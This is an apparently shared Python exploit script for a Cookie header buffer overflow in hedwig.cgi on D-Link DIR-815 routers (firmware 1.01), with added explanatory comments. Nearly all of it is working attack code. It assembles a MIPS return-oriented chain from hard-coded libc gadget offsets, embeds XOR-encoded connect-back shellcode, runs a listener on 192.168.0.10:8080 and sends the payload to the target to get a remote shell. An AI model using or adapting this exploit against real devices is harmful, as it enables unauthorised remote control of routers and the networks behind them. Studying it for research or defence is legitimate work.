zcutlip

D-Link DIR-815 HTTP "Cookie:" buffer overflow

Aug 22nd, 2013
  1. #!/usr/bin/env python
  2.  
  3. #Author: Zachary Cutlip
  4. #        uid000 AT gmail dot com
  5. #        Twitter:@zcutlip
  6. #Target: DIR-815 Rev A1
  7. #Firmware: 1.01
  8. #hedwig.cgi buffer overflow in HTTP header field Cookie: uid="<cookie value>"
  9.  
  10.  
  11. import sys
  12.  
  13. from bowcaster.development import OverflowBuffer
  14. from bowcaster.development import SectionCreator
  15. from bowcaster.common.support import LittleEndian
  16. from bowcaster.common.support import Logging
  17. from bowcaster.payloads.mips.connectback_payload import ConnectbackPayload
  18. from bowcaster.servers.connectback_server import ConnectbackServer
  19. from bowcaster.encoders.mips import MipsXorEncoder
  20. from bowcaster.clients.http import HttpClient
  21.  
# Local address the connect-back payload targets and that ConnectbackServer
# binds in main(). The matching port (8080) is hard-coded separately in main()
# and in a section description inside build_overflow(); keep them in sync.
CALLBACK_IP="192.168.0.10"
  23.  
def build_overflow(logger=None):
    """Assemble the oversized cookie value that overruns the hedwig.cgi buffer.

    A 2048-byte OverflowBuffer is filled from the sections registered on
    ``SC``: four gadget addresses at fixed offsets (rebased against
    ``libc_base_address``) and an XOR-encoded connect-back payload at
    offset 1351. Every section is generated around ``badchars`` so that none
    of those bytes ends up in the final value.

    Args:
        logger: optional bowcaster Logging instance handed to the helpers.

    Returns:
        OverflowBuffer whose str() is used as the ``uid`` cookie value by
        send_overflow().
    """
    # Bytes that must not appear anywhere in the buffer. Presumably chosen
    # because the value travels inside an HTTP header value (NUL, space,
    # CR/LF and double quote would all terminate or break it) - see file header.
    badchars=["\x00","\x20","\r","\n","\""]
    # Base address the gadget offsets below are rebased against. Firmware-
    # specific (file header: DIR-815 Rev A1, firmware 1.01).
    libc_base_address=0x2aaf8000
    # Offsets into the overflow buffer. The names suggest which saved
    # register each slot ends up in; that mapping is not verifiable here.
    reg_s0=1007
    reg_s1=1011
    reg_s2=1015
    reg_s3=1019
    reg_s4=1023
    reg_s5=1027
    reg_s6=1031
    reg_s7=1035
    reg_pc=1043

    # Offset of the return address consumed once sleep() returns (see the
    # second gadget_section below).
    reg_new_ra=1075

    # NOTE: unused below - string_section() is called with the literal 1351.
    stack_return=1351

    SC=SectionCreator(LittleEndian,base_address=libc_base_address,badchars=badchars,logger=logger)

    ###########################################################################
    # Stages a 2 sec arg to sleep() in $a0
    # Stages 0x20+var4($sp) in $ra; return address for sleep()
    # Jumps to $s0
    ###########################################################################
    SC.gadget_section(reg_pc,0x0004FA3C,
                        description="stage arg to sleep in $a0, stage return from sleep in $ra,jalr $s0")


    ###########################################################################
    # Address of sleep() function
    ###########################################################################
    SC.gadget_section(reg_s0,0x56bd0,description="Address of sleep()")


    ###########################################################################
    # Stackfinder. Load the following:
    #   $s4=$sp+0x5d0+var_5b4
    #   $s2=$sp+0x5d0+var_428
    #   $s0=$sp+0x5d0+var_4c0
    # Then jalr $s6
    ###########################################################################
    SC.gadget_section(reg_new_ra,0x000255FC,
                            description="Sleep() returns here.")

    ###########################################################################
    # Jalr to $s0, which should point to the stack.
    ###########################################################################
    SC.gadget_section(reg_s6,0x000159D8,description="jalr to $s0")

    # No port is passed to ConnectbackPayload here; main() listens on 8080 -
    # verify the payload default matches.
    payload=ConnectbackPayload(CALLBACK_IP,LittleEndian)
    # Encoded so the payload itself contains none of badchars.
    encoded_payload=MipsXorEncoder(payload,badchars=badchars,logger=logger)

    # NOTE: the description hard-codes 192.168.0.10:8080 while the payload is
    # built from CALLBACK_IP; it goes stale if that constant changes.
    SC.string_section(1351,encoded_payload.shellcode,
                        description="XOR Encoded connect-back payload. connects back to 192.168.0.10:8080.")

    # 2048-byte buffer with the sections above overlaid at their offsets.
    buf=OverflowBuffer(LittleEndian,2048,overflow_sections=SC.section_list,logger=logger)


    return buf
  83.  
  84.  
def send_overflow(buf,target_ip,logger):
    """POST to hedwig.cgi on *target_ip* with the overflow buffer as the uid cookie.

    Args:
        buf: OverflowBuffer from build_overflow(); str(buf) is interpolated
            into the ``Cookie`` header.
        target_ip: host (or host:port) substituted into the URL.
        logger: bowcaster Logging instance used for the progress message.

    Returns:
        None. A failed send is printed and swallowed, so main() cannot tell
        whether the request was delivered before it calls server.wait().
    """
    client=HttpClient()
    headers={}
    # Referer is a fixed 192.168.0.1 address; it is not derived from target_ip.
    headers["Referer"]="http://192.168.0.1/bsc_wlan.php"
    headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
    headers["Connection"]="keep-alive"
    # The cookie value is sent unquoted; the badchars list in build_overflow()
    # is what keeps whitespace, quotes and CR/LF out of it.
    headers["Cookie"]="uid=%s" % str(buf)
    url="http://%s/hedwig.cgi" % target_ip

    post_data='SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS'
    logger.LOG_INFO("Sending post request.")
    try:
        client.send(url,headers=headers,post_data=post_data,urlencode=True)
    except Exception as e:
        # Python 2 print statement. NOTE(review): the broad except also hides
        # programming errors, not just network failures.
        print e
    return
  101.  
def find_offset(buf,find_data):
    """Return the offset of *find_data* inside *buf*.

    A value starting with ``"0x"`` is parsed as an integer (base 0) and the
    lookup is logged at DEBUG; any other value is handed to
    ``buf.find_offset()`` unchanged.
    """
    needle = find_data
    if needle.startswith("0x"):
        needle = int(needle, 0)
        Logging().LOG_DEBUG("Finding %#010x" % needle)
    return buf.find_offset(needle)
  109.  
def main(command):
    """Entry point: report an offset, or start the listener and send the request.

    Args:
        command: ``find=<value>`` logs the offset of <value> in the overflow
            buffer and exits 0; any other string is used as the target IP.

    Raises:
        SystemExit: 0 after a find= lookup, 1 if the connect-back server
            could not be started.
    """

    logger=Logging()
    logger.LOG_INFO("Bulding overflow.")
    buf=build_overflow(logger)


    # Offset lookup mode: nothing is sent and no server is started.
    if command.startswith("find="):
        find_string=command.split("find=")[1]
        offset=find_offset(buf,find_string)
        logger.LOG_INFO("Offset of %s: %d" %(find_string,offset))
        sys.exit(0)

    # Listener for the payload's connection; binds CALLBACK_IP:8080 locally.
    logger.LOG_INFO("Starting server.")
    server=ConnectbackServer(CALLBACK_IP,port=8080,logger=logger)
    # serve() is treated as returning a truthy value on success - assumption,
    # the semantics belong to bowcaster.
    pid=server.serve()

    target_ip=command
    if pid:
        try:
            send_overflow(buf,target_ip,logger)
            # send_overflow() swallows send errors, so this wait happens even
            # if the request never left. Presumably blocks until the server
            # is done; shutdown() is only called on the exception path.
            server.wait()
        except Exception as e:
            # Python 2 print statement.
            print e
            server.shutdown()
    else:
        logger.LOG_WARN("Failed to start connect-back server.")
        sys.exit(1)

    logger.LOG_INFO("Done.")
  140.  
if __name__=="__main__":
    # Exactly one positional argument (target IP or find=<value>); there is
    # no usage check, so a missing argument raises IndexError.
    main(sys.argv[1])